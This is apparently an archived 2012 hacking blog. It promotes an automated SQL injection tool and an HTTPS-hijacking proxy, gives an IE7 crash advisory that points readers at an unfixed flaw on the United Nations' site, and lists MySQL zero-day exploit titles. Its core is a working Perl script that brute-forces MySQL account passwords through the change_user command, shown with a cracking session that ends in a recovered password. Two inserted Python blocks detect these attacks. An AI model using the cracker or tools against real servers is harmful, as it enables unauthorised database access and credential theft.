Dec 7, 2012

jSQL Injection - Java based automated SQL injection tool

An easy-to-use SQL injection tool to retrieve database information from a remote server.
jSQL Injection features:
  • GET, POST, header and cookie injection methods
  • normal, error-based, blind and time-based algorithms
  • automatic detection of the best algorithm
  • progress display for data retrieval
  • proxy settings
  • evasion
  • for now supports only MySQL
Download the Java executable here, or access the source code for programmers in the Google Git repository. Current tools used for development: Windows 7, Eclipse, EasyPHP, Notepad++, EGit.
Next work: speed increase (100% faster, literally), more blind testing, automatic code testing (JUnit) 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 6, 2012

Hyperfox transparently hijacking/proxying HTTP and HTTPS traffic


Before installing, make sure you have a working Go environment and git.
Check that your PATH and GOPATH variables are correctly set in your .bashrc, .zshrc or .profile file.
$ cat .zshrc
# ... stuff ...
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
And that pkg, src and bin exist.
$ mkdir -p $GOPATH/src
$ mkdir -p $GOPATH/bin
$ mkdir -p $GOPATH/pkg
Now attempt to install.
% go get
% hyperfox -h

Usage example

Run hyperfox; it will start in HTTP mode listening at by default.
% hyperfox
If you want to analyze HTTPS instead of HTTP, use the -s flag and provide appropriate cert.pem and key.pem files.
% hyperfox -s -c ssl/cert.pem -k ssl/key.pem
hyperfox won’t be of much use if the host machine has no traffic to analyze or if the only traffic to analyze is its own.


DoS vulnerabilities in Internet Explorer 7 (access violation)

Affected products:

Internet Explorer 7 (7.00.5730.13) and other versions of IE7 are vulnerable.
IE6 and IE8 are not affected.

When a redirector responding with status 301, 302 or 303 and a data: URI in the
Location header is included in a frame or iframe tag, the browser crashes (the
attack doesn't work with other 30x statuses). This happens due to an access
violation (aka segmentation fault) in iexplore.exe.

This is a 302 redirector in Perl. You can make similar redirectors with 301,
302 or 303 statuses.

As a 301 redirector you can use my example with a data: URI at TinyURL:

The attack works from the second attempt, so you need to go to the redirector
twice (set the URL twice in the address bar, or, after the error page appears,
return to the previous page in the browser).

Example of an attack with this redirector via a vulnerability at the United
Nations' site (they haven't fixed it since 29.04.2010, when I found this hole
and informed the UN, so you can use it for checking purposes):
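As an added defender-side check (not part of the advisory above): a filter for a proxy or IDS that flags exactly the response shape the advisory describes, a 301/302/303 whose Location header carries a data: URI, and ignores the 30x statuses the advisory says do not trigger the crash. The sample response heads are constructed.

```python
import re

# Constructed sample HTTP response heads (not captured traffic). The first two
# match the advisory's pattern: 301/302/303 with a data: URI in Location.
SAMPLES = {
    "302_data": "HTTP/1.1 302 Found\r\nServer: x\r\nLocation: data:text/html,hello\r\n\r\n",
    "301_data_mixed_case": "HTTP/1.1 301 Moved Permanently\r\nlocation:  DATA:text/plain,x\r\n\r\n",
    "307_data": "HTTP/1.1 307 Temporary Redirect\r\nLocation: data:text/html,hello\r\n\r\n",
    "302_http": "HTTP/1.1 302 Found\r\nLocation: http://example.com/\r\n\r\n",
    "200_ok": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n",
}

STATUS_RE = re.compile(r"^HTTP/\d\.\d (\d{3})")
# Only these redirect statuses trigger the crash according to the advisory.
CRASH_STATUSES = {301, 302, 303}


def parse_head(raw):
    """Return (status_code, headers) from a raw response head. Header names are
    lower-cased so lookups are case-insensitive; a bad status line raises."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = STATUS_RE.match(lines[0])
    if not m:
        raise ValueError("malformed status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return int(m.group(1)), headers


def is_data_uri_redirect(raw):
    """True when the response is a 301/302/303 whose Location is a data: URI,
    the combination the advisory reports crashing IE7 inside a frame/iframe."""
    status, headers = parse_head(raw)
    location = headers.get("location", "")
    return status in CRASH_STATUSES and location.lower().startswith("data:")


def flag_samples(samples=SAMPLES):
    """Return the sorted names of the samples that match the crash pattern."""
    return sorted(name for name, raw in samples.items() if is_data_uri_redirect(raw))
```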


Dec 5, 2012

Interesting Exploit in 2012-12-05 [Apache Tomcat]

Apache Tomcat 6.x / 7.x Denial Of Service

Apache Tomcat Security Bypass

Apache Tomcat CSRF Prevention Filter Bypass


Dec 4, 2012

MySQL Local/Remote FAST Account Password Cracking By Kingcope

The attacker logs into the mysql server with an unprivileged account.
There is a command in mysql called change_user; as the name suggests, it can
be used to change the user during a mysql session. Since mysql is very fast at
doing this, it is much more powerful for cracking passwords than reconnecting
to the mysql server for every guess to brute-force passwords (which would be
VERY slow).
Since the SALT does not change in the change_user command (and this is the
weak point), it is a convenient way to crack passwords. (When connecting to
mysql, the SALT is different in each connection attempt and is sent out by
the server.)

use Net::MySQL;

# Connect once with a valid low-privilege account; the handshake salt
# ($mysql->{salt}) is sent only here and is reused by every change_user below.
my $mysql = Net::MySQL->new(
    hostname => '',        # target host (left blank in the original post)
    database => 'test',
    user     => "user",
    password => "secret",
    debug    => 0,
);

$crackuser = "crackme";    # account whose password is being guessed

while (<STDIN>) {
    chomp;
    $currentpass = $_;

    # COM_CHANGE_USER payload: user\0, 0x14 length byte + 20-byte scramble, db\0
    $vv = join "\0",
        $crackuser,
        "\x14" . Net::MySQL::Password->scramble(
            $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
        ) . "\0";
    if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
    }
}
example session:

john --incremental --stdout=5 | perl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted
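As an added detection example (not part of Kingcope's post): because this technique drives many change_user commands down one already-open connection, a burst of "Change user" entries from a single thread id in MySQL's general query log is its footprint. The code assumes the 5.x general_log file layout (Time / Id / Command / Argument columns, timestamp omitted when unchanged from the previous entry); the log sample is constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of a MySQL 5.x general_log file (not a real capture).
# As mysqld does, entries in the same second as the previous one omit the timestamp.
SAMPLE_LOG = """\
Time                 Id Command    Argument
121204 10:15:32\t    5 Connect\tuser@localhost on test
\t\t    5 Query\tselect @@version_comment limit 1
121204 10:15:33\t    5 Change user\tcrackme@localhost on
\t\t    5 Change user\tcrackme@localhost on
\t\t    5 Change user\tcrackme@localhost on
121204 10:15:34\t    5 Change user\tcrackme@localhost on
\t\t    5 Change user\tcrackme@localhost on
121204 10:15:40\t    6 Connect\tapp@10.0.0.7 on shop
\t\t    6 Query\tselect 1
121204 10:15:41\t    6 Change user\tapp@10.0.0.7 on shop
"""

# Optional timestamp, tab, thread id, command name ("Change user" = COM_CHANGE_USER), tab, argument.
LINE_RE = re.compile(
    r"^(?P<ts>\d{6} \d{1,2}:\d{2}:\d{2})?\t\s*(?P<id>\d+) (?P<cmd>[A-Za-z ]+?)\t(?P<arg>.*)$")


def parse_general_log(text):
    """Yield (timestamp, thread_id, command, argument) tuples, carrying the
    last seen timestamp forward onto entries that omit it."""
    last_ts = None
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # file header or other non-entry line
        if m.group("ts"):
            last_ts = datetime.strptime(m.group("ts"), "%y%m%d %H:%M:%S")
        if last_ts is not None:
            yield last_ts, int(m.group("id")), m.group("cmd"), m.group("arg")


def change_user_bursts(text, threshold=3, window_seconds=60):
    """Return {thread_id: peak} for threads that issued at least `threshold`
    Change user commands inside any `window_seconds` sliding window; one
    connection re-authenticating rapidly is the signature of this attack."""
    recent, peak = defaultdict(deque), defaultdict(int)
    for ts, tid, cmd, _ in parse_general_log(text):
        if cmd != "Change user":
            continue
        q = recent[tid]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        peak[tid] = max(peak[tid], len(q))
    return {tid: n for tid, n in peak.items() if n >= threshold}
```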


Interesting Exploit in 2012-12-04 [Oracle, Web Application]

Oracle MySQL Privilege Escalation

vBulletin 3.x <= 4.2.0 FAQ (Echo config) bug 

Oracle MySQL 5.5.19-log Denial Of Service

Oracle MySQL Windows Stuxnet Technique SYSTEM Exploit

Oracle MySQL User Account Enumeration Utility

RIM BlackBerry PlayBook OS Local File Access Vulnerability

vBulletin 4.2.0 Full Path Disclosure Vulnerability

Wordpress 3.4.2 Full Path Disclosure Vulnerability


Dec 2, 2012

Interesting Exploit 2012-12-02 [MySQL]

MySQL (Linux) Heap Based Overrun PoC Zeroday

MySQL Denial of Service Zeroday PoC

MySQL (Linux) Database Privilege Elevation Zeroday Exploit

MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)

MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday

MySQL Remote Preauth User Enumeration Zeroday

Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit

MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day
